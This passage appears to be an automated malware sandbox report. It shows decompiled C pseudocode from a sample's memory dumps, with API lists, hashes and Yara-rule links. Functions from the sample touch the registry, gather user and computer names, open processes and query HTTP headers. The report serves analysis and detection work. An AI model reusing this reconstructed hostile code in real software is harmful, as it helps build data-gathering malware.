                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1886625739-0
                                                                                                                                                                                                                                • Opcode ID: a1aac9641869cf57c5f9968d650abc7c6df0524375442cabc4e165fa5ebcb5e8
                                                                                                                                                                                                                                • Instruction ID: 41aef0cba4c2a80657b7a097d16eab7bed4a06df7e6c14bda5f7a64200cd4ec9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1aac9641869cf57c5f9968d650abc7c6df0524375442cabc4e165fa5ebcb5e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A521607490060AAFD716DF69D944EAABBFCFF083847014469E685C7210D7F4EA05CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB4847, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E02BB4847(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2bbd37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02BB3037( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02BB2B5D(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02BB53BB(_a8);
						goto L29;
					}
					_t64 =  *0x2bbd2b0; // 0x52f9bb8
					_t16 = _t64 + 0xc; // 0x52f9c86
					_t65 = E02BB3037(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02bbc0
						if(E02BB9BAF(_t97,  *_t33, _t91, _a8,  *0x2bbd374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2bbd2e0; // 0x273a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2bbea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2bbea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E02BB5E8A(_t69,  *0x2bbd374,  *0x2bbd378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2bbd2e0; // 0x273a5a8
									_t44 = _t71 + 0x2bbe83e; // 0x74666f53
									_t73 = E02BB3037(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02bbc0
										E02BB9BED( *_t47, _t91, _a8,  *0x2bbd378, _a24);
										_t49 = _t101 + 0x10; // 0x3d02bbc0
										E02BB9BED( *_t49, _t91, _t99,  *0x2bbd370, _a16);
										E02BB53BB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02bbc0
									E02BB9BED( *_t40, _t91, _a8,  *0x2bbd378, _a24);
									_t43 = _t101 + 0x10; // 0x3d02bbc0
									E02BB9BED( *_t43, _t91, _a8,  *0x2bbd370, _a16);
								}
								if( *_t101 != 0) {
									E02BB53BB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02bbc0
					_t81 = E02BB63D1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02bbc0
							E02BB9BAF(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02BB53BB(_t100);
						_t98 = _a16;
					}
					E02BB53BB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02BBA929(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2bbd37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                                                                                                                0x02bb4847
                                                                                                                                                                                                                                0x02bb4850
                                                                                                                                                                                                                                0x02bb4857
                                                                                                                                                                                                                                0x02bb485c
                                                                                                                                                                                                                                0x02bb48c9
                                                                                                                                                                                                                                0x02bb48cf
                                                                                                                                                                                                                                0x02bb48d4
                                                                                                                                                                                                                                0x02bb48db
                                                                                                                                                                                                                                0x02bb48e0
                                                                                                                                                                                                                                0x02bb48e5
                                                                                                                                                                                                                                0x02bb4a50
                                                                                                                                                                                                                                0x02bb4a57
                                                                                                                                                                                                                                0x02bb4a57
                                                                                                                                                                                                                                0x02bb4a5c
                                                                                                                                                                                                                                0x02bb4a5e
                                                                                                                                                                                                                                0x02bb4a5e
                                                                                                                                                                                                                                0x02bb4a67
                                                                                                                                                                                                                                0x02bb4a67
                                                                                                                                                                                                                                0x02bb48eb
                                                                                                                                                                                                                                0x02bb48f7
                                                                                                                                                                                                                                0x02bb4a46
                                                                                                                                                                                                                                0x02bb4a49
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4a49
                                                                                                                                                                                                                                0x02bb48fd
                                                                                                                                                                                                                                0x02bb4902
                                                                                                                                                                                                                                0x02bb4905
                                                                                                                                                                                                                                0x02bb490a
                                                                                                                                                                                                                                0x02bb490f
                                                                                                                                                                                                                                0x02bb4958
                                                                                                                                                                                                                                0x02bb4958
                                                                                                                                                                                                                                0x02bb496b
                                                                                                                                                                                                                                0x02bb4975
                                                                                                                                                                                                                                0x02bb497b
                                                                                                                                                                                                                                0x02bb4982
                                                                                                                                                                                                                                0x02bb498c
                                                                                                                                                                                                                                0x02bb498c
                                                                                                                                                                                                                                0x02bb4984
                                                                                                                                                                                                                                0x02bb4984
                                                                                                                                                                                                                                0x02bb4984
                                                                                                                                                                                                                                0x02bb4984
                                                                                                                                                                                                                                0x02bb49ae
                                                                                                                                                                                                                                0x02bb49b6
                                                                                                                                                                                                                                0x02bb49e4
                                                                                                                                                                                                                                0x02bb49e9
                                                                                                                                                                                                                                0x02bb49f0
                                                                                                                                                                                                                                0x02bb49f5
                                                                                                                                                                                                                                0x02bb49f9
                                                                                                                                                                                                                                0x02bb4a2b
                                                                                                                                                                                                                                0x02bb49fb
                                                                                                                                                                                                                                0x02bb4a08
                                                                                                                                                                                                                                0x02bb4a0b
                                                                                                                                                                                                                                0x02bb4a1b
                                                                                                                                                                                                                                0x02bb4a1e
                                                                                                                                                                                                                                0x02bb4a24
                                                                                                                                                                                                                                0x02bb4a24
                                                                                                                                                                                                                                0x02bb49b8
                                                                                                                                                                                                                                0x02bb49c5
                                                                                                                                                                                                                                0x02bb49c8
                                                                                                                                                                                                                                0x02bb49da
                                                                                                                                                                                                                                0x02bb49dd
                                                                                                                                                                                                                                0x02bb49dd
                                                                                                                                                                                                                                0x02bb4a35
                                                                                                                                                                                                                                0x02bb4a41
                                                                                                                                                                                                                                0x02bb4a37
                                                                                                                                                                                                                                0x02bb4a3a
                                                                                                                                                                                                                                0x02bb4a3a
                                                                                                                                                                                                                                0x02bb4a35
                                                                                                                                                                                                                                0x02bb49ae
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4975
                                                                                                                                                                                                                                0x02bb491e
                                                                                                                                                                                                                                0x02bb4921
                                                                                                                                                                                                                                0x02bb4928
                                                                                                                                                                                                                                0x02bb492e
                                                                                                                                                                                                                                0x02bb4931
                                                                                                                                                                                                                                0x02bb4933
                                                                                                                                                                                                                                0x02bb493f
                                                                                                                                                                                                                                0x02bb4942
                                                                                                                                                                                                                                0x02bb4942
                                                                                                                                                                                                                                0x02bb4948
                                                                                                                                                                                                                                0x02bb494d
                                                                                                                                                                                                                                0x02bb494d
                                                                                                                                                                                                                                0x02bb4953
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4953
                                                                                                                                                                                                                                0x02bb4861
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4888
                                                                                                                                                                                                                                0x02bb4888
                                                                                                                                                                                                                                0x02bb4894
                                                                                                                                                                                                                                0x02bb48a7
                                                                                                                                                                                                                                0x02bb48ad
                                                                                                                                                                                                                                0x02bb48b5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb48b5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(02BB51FC,0000005F,00000000,00000000,00000104), ref: 02BB487A
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 02BB48A7
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                  • Part of subcall function 02BB9BED: lstrlenW.KERNEL32(?,?,?,02BB4A10,3D02BBC0,80000002,02BB51FC,02BB2DE9,74666F53,4D4C4B48,02BB2DE9,?,3D02BBC0,80000002,02BB51FC,?), ref: 02BB9C12
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 02BB48C9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                • String ID: ($\
                                                                                                                                                                                                                                • API String ID: 3924217599-1512714803
                                                                                                                                                                                                                                • Opcode ID: 39ff9a75fc3cf743de7fae824825f3557e98d61fcd1070d17bcf10787bdb68de
                                                                                                                                                                                                                                • Instruction ID: 11d0065dd2671e9b913a36eca69447de9410c16ee239dae144b917d01a2133ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39ff9a75fc3cf743de7fae824825f3557e98d61fcd1070d17bcf10787bdb68de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E51487150060AAFDF239F60D950EEA37BAFF08344F008995FA6592121D7B5E925EF10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81D65, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81D65() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x2b841b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x2b841bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x2b841ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x2b841a8 = _t5;
						 *0x2b841b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x2b841a4 = _t6;
						if(_t6 == 0) {
							 *0x2b841a4 =  *0x2b841a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                                                                                                                                                0x02b81d66
                                                                                                                                                                                                                                0x02b81d74
                                                                                                                                                                                                                                0x02b81d7a
                                                                                                                                                                                                                                0x02b81d81
                                                                                                                                                                                                                                0x02b81dd8
                                                                                                                                                                                                                                0x02b81dd8
                                                                                                                                                                                                                                0x02b81d83
                                                                                                                                                                                                                                0x02b81d8b
                                                                                                                                                                                                                                0x02b81d98
                                                                                                                                                                                                                                0x02b81d98
                                                                                                                                                                                                                                0x02b81dd4
                                                                                                                                                                                                                                0x02b81dd6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81d8d
                                                                                                                                                                                                                                0x02b81d94
                                                                                                                                                                                                                                0x02b81d9a
                                                                                                                                                                                                                                0x02b81d9a
                                                                                                                                                                                                                                0x02b81d9f
                                                                                                                                                                                                                                0x02b81dad
                                                                                                                                                                                                                                0x02b81db2
                                                                                                                                                                                                                                0x02b81db8
                                                                                                                                                                                                                                0x02b81dbe
                                                                                                                                                                                                                                0x02b81dc5
                                                                                                                                                                                                                                0x02b81dc7
                                                                                                                                                                                                                                0x02b81dc7
                                                                                                                                                                                                                                0x02b81dd1
                                                                                                                                                                                                                                0x02b81d96
                                                                                                                                                                                                                                0x02b81d96
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81d96
                                                                                                                                                                                                                                0x02b81d94

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02B81577), ref: 02B81D74
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 02B81D83
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02B81D9F
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B81DB8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 845504543-1084903527
                                                                                                                                                                                                                                • Opcode ID: 8291df9e496abd86d6c20688d91f064d814c881c747ed7f4f4bfc279259efef0
                                                                                                                                                                                                                                • Instruction ID: 4481cf95d44caffaf36a22c8bbcd34318473ba79a41be9a37d35b758acbd6328
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8291df9e496abd86d6c20688d91f064d814c881c747ed7f4f4bfc279259efef0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86F01971ED5302ABE711AE68BC057653FE0EB05B91F104895E50DEB1C0F7B080A6CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB7095, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E02BB7095() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2bbd364; // 0x52f95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2bbd364; // 0x52f95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2bbd364; // 0x52f95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2bbe823) {
					HeapFree( *0x2bbd270, 0, _t10);
					_t7 =  *0x2bbd364; // 0x52f95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                                                                                                                0x02bb7095
                                                                                                                                                                                                                                0x02bb709e
                                                                                                                                                                                                                                0x02bb70ae
                                                                                                                                                                                                                                0x02bb70ae
                                                                                                                                                                                                                                0x02bb70b3
                                                                                                                                                                                                                                0x02bb70b8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb70a8
                                                                                                                                                                                                                                0x02bb70a8
                                                                                                                                                                                                                                0x02bb70ba
                                                                                                                                                                                                                                0x02bb70bf
                                                                                                                                                                                                                                0x02bb70c3
                                                                                                                                                                                                                                0x02bb70d6
                                                                                                                                                                                                                                0x02bb70dc
                                                                                                                                                                                                                                0x02bb70dc
                                                                                                                                                                                                                                0x02bb70e5
                                                                                                                                                                                                                                0x02bb70e7
                                                                                                                                                                                                                                0x02bb70eb
                                                                                                                                                                                                                                0x02bb70f1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BB709E
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,02BB5884), ref: 02BB70A8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,02BB5884), ref: 02BB70D6
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BB70EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: df1eda996b4e7588c917298aa524b1638f58e16a2f74ab9bf0c2590aad4be128
                                                                                                                                                                                                                                • Instruction ID: 1c71725c45008d6d91cbbffcf7d83b8a192bf3295a966d82743cd6348a34e940
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df1eda996b4e7588c917298aa524b1638f58e16a2f74ab9bf0c2590aad4be128
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F03475E882029FEB1ACF64DA89F657BA0FF44380B44884AF502C7250CBF4E820DA24
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6706, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB6706() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02BB5157(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02BB53BB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2bba626
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                                                                                                                                0x02bb6714
                                                                                                                                                                                                                                0x02bb6717
                                                                                                                                                                                                                                0x02bb671a
                                                                                                                                                                                                                                0x02bb6720
                                                                                                                                                                                                                                0x02bb6725
                                                                                                                                                                                                                                0x02bb672b
                                                                                                                                                                                                                                0x02bb6733
                                                                                                                                                                                                                                0x02bb6736
                                                                                                                                                                                                                                0x02bb673c
                                                                                                                                                                                                                                0x02bb6741
                                                                                                                                                                                                                                0x02bb674e
                                                                                                                                                                                                                                0x02bb675b
                                                                                                                                                                                                                                0x02bb675f
                                                                                                                                                                                                                                0x02bb6761
                                                                                                                                                                                                                                0x02bb6765
                                                                                                                                                                                                                                0x02bb6768
                                                                                                                                                                                                                                0x02bb6778
                                                                                                                                                                                                                                0x02bb67cb
                                                                                                                                                                                                                                0x02bb67cc
                                                                                                                                                                                                                                0x02bb677a
                                                                                                                                                                                                                                0x02bb677f
                                                                                                                                                                                                                                0x02bb6780
                                                                                                                                                                                                                                0x02bb6785
                                                                                                                                                                                                                                0x02bb6788
                                                                                                                                                                                                                                0x02bb679b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb679d
                                                                                                                                                                                                                                0x02bb67a0
                                                                                                                                                                                                                                0x02bb67a5
                                                                                                                                                                                                                                0x02bb67b3
                                                                                                                                                                                                                                0x02bb67b6
                                                                                                                                                                                                                                0x02bb67bc
                                                                                                                                                                                                                                0x02bb67c1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb67c3
                                                                                                                                                                                                                                0x02bb67c3
                                                                                                                                                                                                                                0x02bb67c6
                                                                                                                                                                                                                                0x02bb67c6
                                                                                                                                                                                                                                0x02bb67c1
                                                                                                                                                                                                                                0x02bb679b
                                                                                                                                                                                                                                0x02bb67d1
                                                                                                                                                                                                                                0x02bb67d2
                                                                                                                                                                                                                                0x02bb6741
                                                                                                                                                                                                                                0x02bb67d8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,02BBA624), ref: 02BB671A
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,02BBA624), ref: 02BB6736
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,02BBA624), ref: 02BB6770
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(02BBA624,?), ref: 02BB6793
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BBA624,00000000,02BBA626,00000000,00000000,?,?,02BBA624), ref: 02BB67B6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850880919-0
                                                                                                                                                                                                                                • Opcode ID: fc2830b7b749b6d7b9e71ded10567588e07435ca5e616ae375c897abe62bc012
                                                                                                                                                                                                                                • Instruction ID: 7ff4f3717b0d6b831c1af63871559c527bfadca3efe3795376bebddf0429d87b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc2830b7b749b6d7b9e71ded10567588e07435ca5e616ae375c897abe62bc012
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F021C9B6900108FFCB12DFA5C984DEEBBBDEF44644B5044AAE502E7600E7B09E55DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB9EEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 18%
                                                                                                                                                                                                                                			E02BB9EEE(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0);
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x7021fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E02BB5157(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E02BB5157(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E02BB53BB(_v20);
					}
					goto L12;
				}
			}












                                                                                                                                                                                                                                0x02bb9ef4
                                                                                                                                                                                                                                0x02bb9efb
                                                                                                                                                                                                                                0x02bb9efe
                                                                                                                                                                                                                                0x02bb9f01
                                                                                                                                                                                                                                0x02bb9f03
                                                                                                                                                                                                                                0x02bb9f08
                                                                                                                                                                                                                                0x02bb9feb
                                                                                                                                                                                                                                0x02bb9ff1
                                                                                                                                                                                                                                0x02bb9ff1
                                                                                                                                                                                                                                0x02bb9f12
                                                                                                                                                                                                                                0x02bb9f19
                                                                                                                                                                                                                                0x02bb9f21
                                                                                                                                                                                                                                0x02bb9fe2
                                                                                                                                                                                                                                0x02bb9fe8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9fe8
                                                                                                                                                                                                                                0x02bb9f2a
                                                                                                                                                                                                                                0x02bb9f2e
                                                                                                                                                                                                                                0x02bb9f2f
                                                                                                                                                                                                                                0x02bb9f30
                                                                                                                                                                                                                                0x02bb9f36
                                                                                                                                                                                                                                0x02bb9f37
                                                                                                                                                                                                                                0x02bb9f3c
                                                                                                                                                                                                                                0x02bb9f43
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9f49
                                                                                                                                                                                                                                0x02bb9f58
                                                                                                                                                                                                                                0x02bb9f5b
                                                                                                                                                                                                                                0x02bb9f5e
                                                                                                                                                                                                                                0x02bb9f67
                                                                                                                                                                                                                                0x02bb9f6c
                                                                                                                                                                                                                                0x02bb9f71
                                                                                                                                                                                                                                0x02bb9fd9
                                                                                                                                                                                                                                0x02bb9f73
                                                                                                                                                                                                                                0x02bb9f76
